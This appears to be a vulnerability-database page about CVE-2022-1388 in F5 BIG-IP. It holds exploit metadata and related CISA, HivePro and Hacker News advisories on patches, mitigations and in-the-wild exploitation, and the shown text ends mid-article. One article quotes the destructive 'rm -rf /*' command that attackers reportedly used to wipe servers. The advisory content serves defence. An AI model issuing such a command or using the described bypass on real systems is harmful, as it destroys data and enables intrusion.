DATABASE RESOURCES PRICING ABOUT US

{"id": "66904DD3-2D0B-5C1E-8FFC-FD207B41F6EB", "vendorId": null, "type": "githubexploit", "bulletinFamily": "exploit", "title": "Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager", "description": "# CVE-2022-1388 Poc by PsychoSec\nImproved POC for CVE-2022-1388 ...", "published": "2022-05-15T03:58:21", "modified": "2022-06-08T16:32:32", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 7.5}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "", "reporter": "", "references": [], "cvelist": ["CVE-2022-1388"], "immutableFields": [], "lastseen": "2022-06-08T18:12:07", "viewCount": 114, "enchantments": {"vulnersScore": "PENDING"}, "_state": {}, "_internal": {}, "privateArea": 1}

{"hivepro": [{"lastseen": "2022-05-10T17:36:31", "description": "THREAT LEVEL: Amber. For a detailed advisory, download the pdf file here Last week, F5 patched a vulnerability tracked as CVE-2022-1388, soon after a successful Proof-of-concept(PoC) was developed by security researchers making it susceptible to further exploitation. This authentication bypass vulnerability affects the iControl REST component in BIG-IP systems. An unauthenticated attacker could use this flaw to gain initial access and control of a vulnerable machine, allowing remote code execution. This vulnerability has been fixed in versions 17.0.0, 16.1.2.2, 15.1.5.1, 14.1.4.6 or 13.1.5. Organizations that are unable to update their versions are advised to follow these mitigations: \u2022Blocking iControl REST access through the self IP address \u2022Blocking iControl REST access through the management interface \u2022Modifying the BIG-IP httpd configuration Potential MITRE ATT&amp;CK TTPs are: TA0042: Resource Development T1588: Obtain Capabilities T1588.005: Obtain Capabilities: Exploits T1588.006: Obtain Capabilities: Vulnerabilities TA0001: Initial Access T1190: Exploit Public-Facing Application Vulnerability Details Patch Links https://support.f5.com/csp/article/K23605346 References https://twitter.com/ptswarm/status/1522873828896034816", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-10T13:47:42", "type": "hivepro", "title": "Have you patched this actively exploited BIG-IP vulnerability?", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-05-10T13:47:42", "id": "HIVEPRO:8D92547900FABA151C6C4CFE3CF5B9A9", "href": "https://www.hivepro.com/have-you-patched-this-actively-exploited-big-ip-vulnerability/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cisa": [{"lastseen": "2022-05-07T11:27:47", "description": "F5 has released security advisories on vulnerabilities affecting multiple products, including various versions of BIG-IP. Included in the release is [an advisory for CVE-2022-1388](<https://support.f5.com/csp/article/K23605346>), which allows undisclosed requests to bypass the iControl REST authentication in BIG-IP. An attacker could exploit CVE-2022-1388 to take control of an affected system.\n\nCISA encourages users and administrators to review the F5 webpage, [Overview of F5 vulnerabilities (May 2022)](<https://support.f5.com/csp/article/K55879220>), and apply the necessary updates or workarounds.\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2022/05/04/f5-releases-security-advisories-addressing-multiple>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-04T00:00:00", "type": "cisa", "title": "F5 Releases Security Advisories Addressing Multiple Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-05-04T00:00:00", "id": "CISA:CE531246BF5FC97924EF93C811BBA0FF", "href": "https://us-cert.cisa.gov/ncas/current-activity/2022/05/04/f5-releases-security-advisories-addressing-multiple", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-19T11:28:29", "description": "CISA and the Multi-State Information Sharing and Analysis Center (MS-ISAC) have released the joint Cybersecurity Advisory [Threat Actors Exploiting F5 BIG-IP CVE-2022-1388](<http://www.cisa.gov/uscert/ncas/alerts/aa22-138a>) in response to active exploitation of CVE-2022-1388, which affects F5 Networks BIG-IP devices. The vulnerability allows an unauthenticated actor to gain control of affected systems via the management port or self-IP addresses.\n\nCISA encourages users and administrators to review the joint advisory for detection methods and mitigations, which include updating F5 BIG-IP software, or, if unable to immediately update, applying temporary workarounds. \n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2022/05/18/threat-actors-exploiting-f5-big-ip-cve-2022-1388>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-18T00:00:00", "type": "cisa", "title": "Threat Actors Exploiting F5 BIG IP CVE-2022-1388", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-05-18T00:00:00", "id": "CISA:ADBA13BCB35A603303E6E4549200157F", "href": "https://us-cert.cisa.gov/ncas/current-activity/2022/05/18/threat-actors-exploiting-f5-big-ip-cve-2022-1388", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2022-05-12T14:58:41", "description": "[.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjztmZXHimkVGxnTn2_fH7PEzzbqXC_W6aj4kRT1vRxYpg5CAHnd-YSZz6zfKrekVQkC85FVWFLqdNzORk5KBmxWuYLtQ5rUabReOcMhhSkdyVKn8jfCpDm7F63dVOIpfTu3MwoamFrgr0k4H6cwAOw5yiV2aUOWc3-WZJAbWpjqn08yvvF-8mLjNDj/s728-e100/cisa%281%29.jpg>)\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA) has [added](<https://www.cisa.gov/uscert/ncas/current-activity/2022/05/10/cisa-adds-one-known-exploited-vulnerability-catalog>) the recently disclosed F5 BIG-IP flaw to its [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) following reports of [active abuse](<https://thehackernews.com/2022/05/f5-warns-of-new-critical-big-ip-remote.html>) in the wild.\n\nThe flaw, assigned the identifier [CVE-2022-1388](<https://thehackernews.com/2022/05/researchers-develop-rce-exploit-for.html>) (CVSS score: 9.8), concerns a [critical bug](<https://www.randori.com/blog/vulnerability-analysis-cve-2022-1388/>) in the BIG-IP iControl REST endpoint that provides an unauthenticated adversary with a method to execute arbitrary system commands.\n\n\"An attacker can use this vulnerability to do just about anything they want to on the vulnerable server,\" Horizon3.ai [said](<https://www.horizon3.ai/f5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive/>) in a report. \"This includes making configuration changes, stealing sensitive information and moving laterally within the target network.\"\n\nPatches and mitigations for the flaw were announced by F5 on May 4, but it has been [subjected](<https://twitter.com/1ZRR4H/status/1523572874061422593>) to [in-the-wild](<https://twitter.com/bad_packets/status/1523740777406377985>) [exploitation](<https://twitter.com/sans_isc/status/1523732455546494976>) over the past week, with attackers attempting to install a web shell that grants backdoor access to the targeted systems.\n\n\"Due to the ease of exploiting this vulnerability, the public exploit code, and the fact that it provides root access, exploitation attempts are likely to increase,\" Rapid7 security researcher Ron Bowes [noted](<https://www.rapid7.com/blog/post/2022/05/09/active-exploitation-of-f5-big-ip-icontrol-rest-cve-2022-1388/>). \"Widespread exploitation is somewhat mitigated by the [small number](<https://twitter.com/Junior_Baines/status/1522205355287228416>) of internet-facing F5 BIG-IP devices.\"\n\nWhile F5 has since revised its advisory to include what it believes to be \"reliable\" indicators of compromise, it has [cautioned](<https://support.f5.com/csp/article/K23605346>) that \"a skilled attacker can remove evidence of compromise, including log files, after successful exploitation.\"\n\nTo make matters worse, [evidence](<https://twitter.com/sans_isc/status/1523741896707043328>) has [emerged](<https://twitter.com/GossiTheDog/status/1524160730114764801>) that the remote code execution flaw is being used to completely erase targeted servers as part of destructive attacks to render them inoperable by issuing an \"[rm -rf /*](<https://en.wikipedia.org/wiki/Rm_\\(Unix\\)#Syntax>)\" command that recursively deletes all files.\n\n\"Given that the web server runs as root, this should take care of any vulnerable server out there and destroy any vulnerable BIG-IP appliance,\" SANS Internet Storm Center (ISC) [said](<https://twitter.com/sans_isc/status/1523742317059792896>) on Twitter.\n\nIn light of the potential impact of this vulnerability, Federal Civilian Executive Branch (FCEB) agencies have been mandated to patch all systems against the issue by May 31, 2022.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-12T04:42:00", "type": "thn", "title": "CISA Urges Organizations to Patch Actively Exploited F5 BIG-IP Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-05-12T13:47:13", "id": "THN:A2437FEF2D679B5454DA71E850FADEA9", "href": "https://thehackernews.com/2022/05/cisa-urges-organizations-to-patch.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-10T06:22:40", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEg5YVTszIPCrdhSDdbiNHZLx_7Y2PAuginDDFpNuucqQi41rQJzZBQsCVl76q-q6zR9HFVZXmi0yyFewOigZ5wHmfwe70i2i4vV2o1SBRVjWao43lzjnjfsf46ec97G23hfDsQIp9h-V1YqO63aTfI3IpP5L2FNeKMjZZI4kwSp-TrlkIBAZv6Cc902/s728-e100/exploit.jpg>)\n\nDays after F5 released patches for a critical remote code execution vulnerability affecting its BIG-IP family of products, security researchers are warning that they were able to create an exploit for the shortcoming.\n\nTracked [CVE-2022-1388](<https://thehackernews.com/2022/05/f5-warns-of-new-critical-big-ip-remote.html>) (CVSS score: 9.8), the flaw relates to an iControl REST authentication bypass that, if successfully exploited, could lead to remote code execution, allowing an attacker to gain initial access and take control of an affected system.\n\nThis could range anywhere from deploying cryptocurrency miners to dropping web shells for follow-on attacks, such as information theft and ransomware.\n\n\"We have reproduced the fresh CVE-2022-1388 in F5's BIG-IP,\" cybersecurity company Positive Technologies [said](<https://twitter.com/ptswarm/status/1522873828896034816>) in a tweet on Friday. \"Patch ASAP!\"\n\nThe critical security vulnerability impacts the following versions of BIG-IP products -\n\n * 16.1.0 - 16.1.2\n * 15.1.0 - 15.1.5\n * 14.1.0 - 14.1.4\n * 13.1.0 - 13.1.4\n * 12.1.0 - 12.1.6\n * 11.6.1 - 11.6.5\n\nFixes are available in versions 17.0.0, 16.1.2.2, 15.1.5.1, 14.1.4.6, and 13.1.5. Firmware versions 11.x and 12.x will not receive security updates and users relying on those versions should consider upgrading to a newer version or apply the workarounds -\n\n * Block iControl REST access through the self IP address\n * Block iControl REST access through the management interface, and\n * Modify the BIG-IP httpd configuration\n\nLast month, cybersecurity authorities from Australia, Canada, New Zealand, the U.K., and the U.S. jointly [warned](<https://thehackernews.com/2022/04/us-cybersecurity-agency-lists-2021s-top.html>) that threat actors are aggressively targeting \"newly disclosed critical software vulnerabilities against broad target sets, including public and private sector organizations worldwide.\"\n\nWith the F5 BIG-IP flaw found trivial to exploit, malicious hacking crews are expected to follow suit, making it imperative that affected organizations move quickly to apply the patches.\n\n**_Update:_** Security researcher Kevin Beaumont has [warned](<https://twitter.com/GossiTheDog/status/1523222846474014720>) of active exploitation attempts detected in the wild, while simultaneously [alerting](<https://twitter.com/GossiTheDog/status/1523566937414193153>) the availability of a public proof-of-concept (PoC) for the code execution flaw.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-09T03:06:00", "type": "thn", "title": "Researchers Develop RCE Exploit for the Latest F5 BIG-IP Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-05-10T05:05:56", "id": "THN:A17A3E26BF0B1DE93C5D89D6B6107FE3", "href": "https://thehackernews.com/2022/05/researchers-develop-rce-exploit-for.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-19T06:22:57", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjdo6Qyq6Cl_mWJDYZnviXPjIVW9fan7pRXKUukqzb6iq367-LOSVGv_1CUI04hyzkbzuY1-Bv4tKpxA3yDFc8Lo3BByd9UeB1zp9_Ge2Nlm5rKaqo8--9ilJOe_g_LpqeR3wzE9w91bZVrW48gh5XKFDhi4GGN9cpqc_6kGH6bHgEBLLpDdhoC2YpE/s728-e100/vmware.jpg>)\n\nVMware has issued patches to contain [two security flaws](<https://www.vmware.com/security/advisories/VMSA-2022-0014.html>) impacting Workspace ONE Access, Identity Manager, and vRealize Automation that could be exploited to backdoor enterprise networks.\n\nThe first of the two flaws, tracked as CVE-2022-22972 (CVSS score: 9.8), concerns an authentication bypass that could enable an actor with network access to the UI to gain administrative access without prior authentication.\n\nCVE-2022-22973 (CVSS score: 7.8), the other bug, is a case of local privilege escalation that could enable an attacker with local access to elevate privileges to the \"root\" user on vulnerable virtual appliances.\n\n\"It is extremely important that you quickly take steps to patch or mitigate these issues in on-premises deployments,\" VMware [said](<https://core.vmware.com/vmsa-2022-0014-questions-answers-faq>).\n\nThe disclosure follows a [warning](<https://www.cisa.gov/uscert/ncas/current-activity/2022/05/18/cisa-issues-emergency-directive-and-releases-advisory-related>) from the U.S. Cybersecurity and Infrastructure Agency (CISA) that advanced persistent threat (APT) groups are exploiting CVE-2022-22954 and CVE-2022-22960 \u2014 two other VMware flaws that were [fixed](<https://thehackernews.com/2022/04/vmware-releases-critical-patches-for.html>) [early last month](<https://thehackernews.com/2022/04/vmware-releases-patches-for-critical.html>) \u2014 separately and in combination.\n\n\"An unauthenticated actor with network access to the web interface leveraged CVE-2022-22954 to execute an arbitrary shell command as a VMware user,\" it said. \"The actor then exploited CVE-2022-22960 to escalate the user's privileges to root. With root access, the actor could wipe logs, escalate permissions, and move laterally to other systems.\"\n\nOn top of that, the cybersecurity authority noted that threat actors have deployed post-exploitation tools such as the Dingo J-spy web shell in at least three different organizations.\n\nIT security company Barracuda Networks, in an [independent report](<https://blog.barracuda.com/2022/05/17/threat-spotlight-attempts-to-exploit-new-vmware-vulnerabilities/>), said it has observed consistent probing attempts in the wild for CVE-2022-22954 and CVE-2022-22960 soon after the shortcomings became public knowledge on April 6.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjaPrXn1XfHadatV2N4b_itqqrI2wEGgb0BlVgiL8DoxQNoPKFMnfIxeMPf_0BQY1aIj6xJ6Jzp3pdwxrAImifZhB6dWwKp3rkMKVhRr9ZN2DzQWx3gXATGFHXy-Y4ER1Kuj-ZLESMZcPE-O8zmbk7kkpS1n3OzP2U2I6LDrIX-56SfkimD7ARb8lWh/s728-e100/vmware.jpg>)\n\nMore than three-fourths of the attacker IPs, about 76%, are said to have originated from the U.S., followed by the U.K. (6%), Russia (6%), Australia (5%), India (2%), Denmark (1%), and France (1%).\n\nSome of the exploitation attempts recorded by the company involve botnet operators, with the threat actors leveraging the flaws to deploy variants of the [Mirai](<https://thehackernews.com/2022/04/hackers-exploiting-spring4shell.html>) distributed denial-of-service (DDoS) malware.\n\nThe issues have also prompted CISA to issue an [emergency directive](<https://www.cisa.gov/emergency-directive-22-03>) urging federal civilian executive branch (FCEB) agencies to apply the updates by 5 p.m. EDT on May 23 or disconnect the devices from their networks.\n\n\"CISA expects threat actors to quickly develop a capability to exploit these newly released vulnerabilities in the same impacted VMware products,\" the agency said.\n\nThe patches arrive a little over a month after the company rolled out an update to resolve a critical security flaw in its Cloud Director product ([CVE-2022-22966](<https://thehackernews.com/2022/04/critical-vmware-cloud-director-bug.html>)) that could be weaponized to launch remote code execution attacks.\n\n### CISA warns of active exploitation of F5 BIG-IP CVE-2022-1388\n\nIt's not just VMware that's under fire. The agency has also released a follow-up advisory with regards to the active exploitation of [CVE-2022-1388](<https://thehackernews.com/2022/05/cisa-urges-organizations-to-patch.html>) (CVSS score: 9.8), a recently disclosed remote code execution flaw affecting BIG-IP devices.\n\nCISA [said](<https://www.cisa.gov/uscert/ncas/alerts/aa22-138a>) it expects to \"see widespread exploitation of unpatched F5 BIG-IP devices (mostly with publicly exposed management ports or self IPs) in both government and private sector networks.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-19T05:48:00", "type": "thn", "title": "VMware Releases Patches for New Vulnerabilities Affecting Multiple Products", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388", "CVE-2022-22954", "CVE-2022-22960", "CVE-2022-22966", "CVE-2022-22972", "CVE-2022-22973"], "modified": "2022-05-19T05:48:33", "id": "THN:8E366D56AB2756B4DE53AEEA90675132", "href": "https://thehackernews.com/2022/05/vmware-releases-patches-for-new.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:24", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiuH2aYZ8HZSVwPgRk2LN5GoU1qBSksYewifLauRGHFOJYPjWQpTWEJihVR0aDyAzitI4lIjSeBEFzeMdCIelXR4Tuiqqaj8FaPPmj6qmE8pDhOtwbJi_LSk0D7KSj8oBpZ9KhTZl4yUTIpHnLjHuDZ3E3FxES1Y7EK91ZaqaIeWAy85BlaKUFzfesP/s728-e100/f5.jpg>)\n\nCloud security and application delivery network ([ADN](<https://en.wikipedia.org/wiki/Application_delivery_network>)) provider F5 on Wednesday released patches to contain 43 bugs spanning its products.\n\nOf the [43 issues addressed](<https://support.f5.com/csp/article/K55879220>), one is rated Critical, 17 are rated High, 24 are rated Medium, and one is rated low in severity.\n\nChief among the flaws is [CVE-2022-1388](<https://support.f5.com/csp/article/K23605346>), which carries a CVSS score of 9.8 out of a maximum of 10 and stems from a lack of authentication check, potentially allowing an attacker to take control of an affected system.\n\n\"This vulnerability may allow an unauthenticated attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands, create or delete files, or disable services,\" F5 said in an advisory. \"There is no data plane exposure; this is a control plane issue only.\"\n\nThe security vulnerability, which the company said was discovered internally, affects BIG-IP products with the following versions -\n\n * 16.1.0 - 16.1.2\n * 15.1.0 - 15.1.5\n * 14.1.0 - 14.1.4\n * 13.1.0 - 13.1.4\n * 12.1.0 - 12.1.6\n * 11.6.1 - 11.6.5\n\nPatches for the iControl REST authentication bypass flaw have been introduced in versions 17.0.0, 16.1.2.2, 15.1.5.1, 14.1.4.6, and 13.1.5. Other F5 products such as BIG-IQ Centralized Management, F5OS-A, F5OS-C, and Traffix SDC are not vulnerable to CVE-2022-1388.\n\nF5 has also offered temporary workarounds until the fixes can be applied -\n\n * Block iControl REST access through the self IP address\n * Block iControl REST access through the management interface\n * Modify the BIG-IP httpd configuration\n\nOther notable bugs resolved as part of the update include those that could permit an authenticated attacker to bypass Appliance mode restrictions and execute arbitrary JavaScript code in the context of the currently logged-in user.\n\nWith F5 appliances widely deployed in enterprise networks, it's imperative that organizations move quickly to apply the patches to [prevent threat actors](<https://thehackernews.com/2021/08/f5-releases-critical-security-patches.html>) from exploiting the attack vector for initial access.\n\nThe security fixes come as the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added five new flaws to its [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/uscert/ncas/current-activity/2022/05/04/cisa-adds-five-known-exploited-vulnerabilities-catalog>) based on evidence of active exploitation -\n\n * [**CVE-2021-1789**](<https://nvd.nist.gov/vuln/detail/CVE-2021-1789>) \\- Apple Multiple Products [Type Confusion Vulnerability](<https://thehackernews.com/2022/01/hackers-infect-macos-with-new-dazzlespy.html>)\n * [**CVE-2019-8506**](<https://nvd.nist.gov/vuln/detail/CVE-2019-8506>) \\- Apple Multiple Products Type Confusion Vulnerability\n * [**CVE-2014-4113**](<https://nvd.nist.gov/vuln/detail/CVE-2014-4113>) \\- Microsoft Win32k Privilege Escalation Vulnerability\n * [**CVE-2014-0322**](<https://nvd.nist.gov/vuln/detail/CVE-2014-0322>) \\- Microsoft Internet Explorer Use-After-Free Vulnerability\n * [**CVE-2014-0160**](<https://nvd.nist.gov/vuln/detail/CVE-2014-0160>) \\- OpenSSL Information Disclosure Vulnerability\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-05T02:38:00", "type": "thn", "title": "F5 Warns of a New Critical BIG-IP Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0160", "CVE-2014-0322", "CVE-2014-4113", "CVE-2019-8506", "CVE-2021-1789", "CVE-2022-1388"], "modified": "2022-05-05T02:38:14", "id": "THN:87650195BF482879C3C258B474B11411", "href": "https://thehackernews.com/2022/05/f5-warns-of-new-critical-big-ip-remote.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-31T05:56:10", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiBs1v_UBB96XLwx1fhDB24ftZm1R62Ku1955ZGISzLISuse4t_qn4dHBN2z84qTMZzGt97CTTgScoGr9eBOu00Vwlfa9yOw-qRRAXiPJRy7VQLYUNELMAusESXMjCUTEAFj0EPHqLPRnwAtLbNPQLys8F4CDIVvGrmmJqXok_igJowzJPNKzVrBOoL/s728-e100/code.jpg>)\n\nA nascent 